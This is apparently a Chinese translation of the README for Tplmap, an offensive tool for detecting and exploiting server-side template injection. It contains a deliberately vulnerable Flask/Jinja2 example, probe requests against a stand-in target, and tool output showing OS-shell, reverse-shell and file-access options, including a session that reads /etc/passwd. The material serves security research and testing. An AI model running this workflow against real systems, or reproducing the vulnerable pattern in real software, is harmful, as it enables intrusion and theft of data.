本项目已不再维护。只要不破坏测试套件,我会合并新的PR。
Tplmap 协助利用代码注入和服务器端模板注入漏洞,借助多种沙箱逃逸技术,获取底层操作系统的访问权限。
该工具及其测试套件旨在研究 SSTI 漏洞类别,并作为 Web 应用程序渗透测试中的进攻性安全工具使用。
沙箱逃逸技术源自 James Kett 的服务器端模板注入:现代 Web 应用的 RCE、其他公开研究 [1] [2],以及本工具的原創贡献[3] [4]。
它可以利用多种代码上下文和盲注入场景。它还支持 Python、Ruby、PHP、Java 中的类似 eval() 的代码注入以及通用的非沙箱模板引擎。
假设你正在审计一个网站,该网站使用用户提供的值组合模板来生成动态页面,例如下面这个用 Python 和 Flask 编写的 Web 应用程序,它不安全地使用了 Jinja2 模板引擎。
from flask import Flask, request
from jinja2 import Environment
app = Flask(__name__)
Jinja2 = Environment()
@app.route("/page")
def page():
name = request.values.get('name')
# SSTI 漏洞
# 漏洞是由于将用户提供的 `name` 变量拼接到模板字符串中引入的。
output = Jinja2.from_string('Hello ' + name + '!').render()
# 相反,该变量应传递给模板上下文。
# Jinja2.from_string('Hello {{name}}!').render(name = name)
return output
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
从黑盒测试的角度看,页面反射的值类似于 XSS 漏洞,但同时也会在运行时计算基本操作,从而暴露其 SSTI 本质。
$ curl -g 'http://www.target.com/page?name=John'
Hello John!
$ curl -g 'http://www.target.com/page?name={{7*7}}'
Hello 49!
Tplmap 能够检测并利用一系列模板引擎中的 SSTI,从而获取底层文件系统和操作系统的访问权限。将其针对 URL 运行,以测试参数是否可被利用。
$ ./tplmap.py -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options:
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
使用 --os-shell 选项在目标上启动伪终端。
$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Run commands on the operating system.
linux $ whoami
www
linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
Tplmap 支持超过 15 种模板引擎、非沙箱模板引擎以及通用的 eval() 类注入。
| 引擎 | 远程命令执行 | 盲注入 | 代码评估 | 文件读取 | 文件写入 |
|---|---|---|---|---|---|
| Mako | ✓ | ✓ | Python | ✓ | ✓ |
| Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
| Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
| Tornado | ✓ | ✓ | Python | ✓ | ✓ |
| Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |
| doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
| JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Dust (<= [email protected]) | ✓ | ✓ | JavaScript | ✓ | ✓ |
| EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
| Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
| ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
| Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
| PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
| Twig (<=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |
| Freemarker | ✓ | ✓ | Java | ✓ | ✓ |
| Velocity | ✓ | ✓ | Java | ✓ | ✓ |
| Twig (>1.19) | × | × | × | × | × |
| Smarty (secured) | × | × | × | × | × |
| Dust (> [email protected]) | × | × | × | × | × |